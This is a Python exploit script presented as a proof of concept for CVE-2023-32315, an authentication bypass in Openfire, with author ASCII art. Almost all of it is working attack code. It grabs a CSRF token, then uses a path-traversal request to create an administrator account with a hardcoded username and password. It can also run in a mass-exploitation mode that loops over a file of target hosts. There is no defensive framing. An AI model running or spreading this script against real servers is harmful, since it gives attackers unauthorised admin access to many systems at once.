#!/bin/python3 import argparse import subprocess import requests from rich.console import Console color = Console() def ascii_art(): print("") color.print("[yellow] ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ███████[/yellow]") color.print("[yellow]██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ███ ██ [/yellow]") color.print("[yellow]██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ █████ █████ ██ ███████[/yellow]") color.print("[yellow]██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██[/yellow]") color.print("[yellow] ██████ ████ ███████ ███████ ██████ ███████ ██████ ██████ ███████ ██████ ██ ███████[/yellow]") print("") print("Coded By: K3ysTr0K3R --> Hug me ʕっ•ᴥ•ʔっ") print("") def get_csrf_token(target_url): try: response = requests.head(target_url + "/login.jsp") cookies = response.cookies.get_dict() csrf_token = cookies.get('csrf') return csrf_token except requests.RequestException: return None def add_credentials(target_url, csrf_token, username, password): color.print(f"[blue][*][/blue] Launching exploit against: [yellow]{target_url}[/yellow]") vuln_path = f'/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf_token}&username={username}&password={password}&passwordConfirm={password}&isadmin=on&create=Create%2bUser' headers = { "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0", "Cookie": f"csrf={csrf_token}" } color.print("[blue][*][/blue] Checking if the target is vulnerable") check_vuln = requests.get(target_url, headers=headers, verify=False).status_code if check_vuln == 200: color.print("[green][+][/green] Target is vulnerable") color.print("[blue][*][/blue] Adding credentials") add_credentials_cmd = f"curl -I -X GET '{target_url}{vuln_path}' " \ "-H 'Accept-Encoding: gzip, deflate' " \ "-H 'Accept: */*' " \ "-H 'Accept-Language: en-US;q=0.9,en;q=0.8' " \ "-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36' " \ "-H 'Connection: close' " \ "-H 'Cache-Control: max-age=0' " \ f"-H 'Cookie: csrf={csrf_token}'" process = subprocess.Popen(add_credentials_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) output, error = process.communicate() if "200" in str(output): color.print("[green][+][/green] Successfully added, here are the credentials") color.print(f"[green][+][/green] Username: [green]{username}[/green]") color.print(f"[green][+][/green] Password: [green]{password}[/green]") else: color.print("[red][~][red] Failed to add credentials") def exploit(target_url): username = "hugme" password = "HugmeNOW" try: csrf_token = get_csrf_token(target_url) if csrf_token: add_credentials(target_url, csrf_token, username, password) else: color.print("[red][~][/red] CSRF token not found in headers. Vulnerability may not exist.") except requests.RequestException: pass def mass_exploit(target_url, target_file): username = "hugme" password = "HugmeNOW" try: with open(target_file, 'r') as targ: for targs in targ: target_url = targs.strip() csrf_token = get_csrf_token(target_url) if csrf_token: add_credentials(target_url, csrf_token, username, password) except FileNotFoundError: pass except Exception: pass def main(): ascii_art() parser = argparse.ArgumentParser(description='A PoC for CVE-2023-32315 - Openfire Authentication Bypass') parser.add_argument('-u', '--url', help='Target to exploit') parser.add_argument('-f', '--file', help='File containing targets to exploit') args = parser.parse_args() target_url = args.url target_file = args.file if args.url: target_url = args.url exploit(target_url) elif args.file: target_file = args.file mass_exploit(target_url, target_file) if __name__ == "__main__": main()